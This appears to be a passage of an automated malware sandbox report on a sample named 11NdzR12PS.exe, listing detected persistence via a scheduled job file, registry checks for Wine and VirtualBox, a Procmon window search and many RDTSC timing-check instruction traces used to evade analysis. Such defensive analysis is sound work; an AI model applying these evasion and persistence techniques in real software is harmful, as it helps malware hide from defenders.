Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Creates job files (autostart)

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Process information set: NOOPENFILEERRORBOX

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\11NdzR12PS.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B3 second address: D9F1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1B8 second address: D9F1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: D9F1BD second address: D9F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A70 second address: F21A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A76 second address: F21A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21A7B second address: F21ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FF3408102FBh 0x0000000c popad 0x0000000d jmp 00007FF340810303h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jmp 00007FF3408102FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF3408102F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABA second address: F21ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21ABE second address: F21AC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3408102F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F04D6D second address: F04D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2099B second address: F209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F209A1 second address: F209F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB2Dh 0x0000000b jmp 00007FF34080AB18h 0x00000010 jmp 00007FF34080AB0Fh 0x00000015 pushad 0x00000016 jmp 00007FF34080AB19h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F20CCC second address: F20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810300h 0x00000007 jo 00007FF3408102FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F21047 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF34080AB10h 0x00000010 jmp 00007FF34080AB0Eh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2107B second address: F210AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102FEh 0x00000008 jno 00007FF340810302h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FF3408102F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210AC second address: F210BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF34080AB0Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210BF second address: F210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F210C5 second address: F210C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24838 second address: F2483E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2483E second address: F24846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2487A second address: F24884 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24884 second address: F2491C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FF34080AB12h 0x0000000e jg 00007FF34080AB0Ch 0x00000014 mov dword ptr [ebp+122D1A07h], esi 0x0000001a push 00000000h 0x0000001c jmp 00007FF34080AB15h 0x00000021 call 00007FF34080AB09h 0x00000026 pushad 0x00000027 pushad 0x00000028 jno 00007FF34080AB06h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 jmp 00007FF34080AB17h 0x00000036 popad 0x00000037 push eax 0x00000038 jnl 00007FF34080AB23h 0x0000003e pushad 0x0000003f jg 00007FF34080AB06h 0x00000045 jmp 00007FF34080AB15h 0x0000004a popad 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2491C second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF3408102FEh 0x00000014 popad 0x00000015 jmp 00007FF3408102FCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF3408102FAh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F2496A second address: F249D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, ebx 0x0000000c push 00000003h 0x0000000e add dl, 00000000h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FF34080AB08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub ecx, dword ptr [ebp+122D2A56h] 0x00000033 push 00000003h 0x00000035 add dword ptr [ebp+122D2649h], edi 0x0000003b call 00007FF34080AB09h 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF34080AB16h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249D5 second address: F249F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF3408102FFh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F249F0 second address: F24A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FF34080AB10h 0x00000010 pushad 0x00000011 jnp 00007FF34080AB06h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FF34080AB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FF34080AB06h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A23 second address: F24A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF340810302h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A42 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122DB87Dh], edi 0x00000010 lea ebx, dword ptr [ebp+124597A9h] 0x00000016 mov ecx, dword ptr [ebp+122D2B4Eh] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A6C second address: F24A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A72 second address: F24A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24A78 second address: F24A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24ABF second address: F24AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24AD7 second address: F24B58 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B60h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF3408102F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f or dword ptr [ebp+122DB821h], edi 0x00000035 cld 0x00000036 call 00007FF3408102F9h 0x0000003b push ebx 0x0000003c jo 00007FF3408102F8h 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007FF3408102FCh 0x0000004d pop edx 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push edi 0x00000053 jmp 00007FF340810309h 0x00000058 pop edi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F24D77 second address: F24D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB16h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46169 second address: F4616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4616D second address: F46171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F46171 second address: F4617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF340810302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4617F second address: F461AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF34080AB06h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FF34080AB0Ah 0x00000012 jmp 00007FF34080AB0Fh 0x00000017 jc 00007FF34080AB0Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44735 second address: F44739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F44739 second address: F4473F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449AE second address: F449B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449B4 second address: F449C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF34080AB06h 0x0000000e jnp 00007FF34080AB06h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449C8 second address: F449E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FF3408102F8h 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449E5 second address: F449FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F449FE second address: F44A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450B8 second address: F450C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C1 second address: F450C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F450C5 second address: F450CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4520C second address: F45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45213 second address: F45227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB0Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45374 second address: F45378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45378 second address: F45395 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF34080AB13h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45395 second address: F4539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4539B second address: F453B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BCC second address: F45BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810307h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F45BEB second address: F45BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4CFCE second address: F4CFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4D7CA second address: F4D7D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E726 second address: F4E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E72E second address: F4E747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E747 second address: F4E74B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E74B second address: F4E787 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF34080AB11h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a jp 00007FF34080AB06h 0x00000020 popad 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jnp 00007FF34080AB08h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F4E787 second address: F4E791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF3408102F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5313C second address: F53162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB10h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FF34080AB06h 0x00000015 jnc 00007FF34080AB06h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53162 second address: F53192 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF3408102FAh 0x00000015 jmp 00007FF340810306h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53192 second address: F531B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB1Bh 0x00000008 jmp 00007FF34080AB15h 0x0000000d push eax 0x0000000e jg 00007FF34080AB06h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52619 second address: F5261F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52760 second address: F527AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c jmp 00007FF34080AB0Dh 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 je 00007FF34080AB06h 0x0000001c jng 00007FF34080AB06h 0x00000022 popad 0x00000023 pushad 0x00000024 jmp 00007FF34080AB13h 0x00000029 jng 00007FF34080AB06h 0x0000002f push edi 0x00000030 pop edi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CB8 second address: F52CBE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CBE second address: F52CDC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007FF34080AB06h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FF34080AB08h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CDC second address: F52CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CE2 second address: F52CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52CE6 second address: F52D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810304h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52D00 second address: F52D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F52E68 second address: F52E7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007FF3408102F6h 0x00000011 pop ebx 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53987 second address: F5398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F53EB9 second address: F53EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F5467D second address: F5468A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F54829 second address: F54833 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F549D2 second address: F549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F54B22 second address: F54B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: F550C6 second address: F550CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
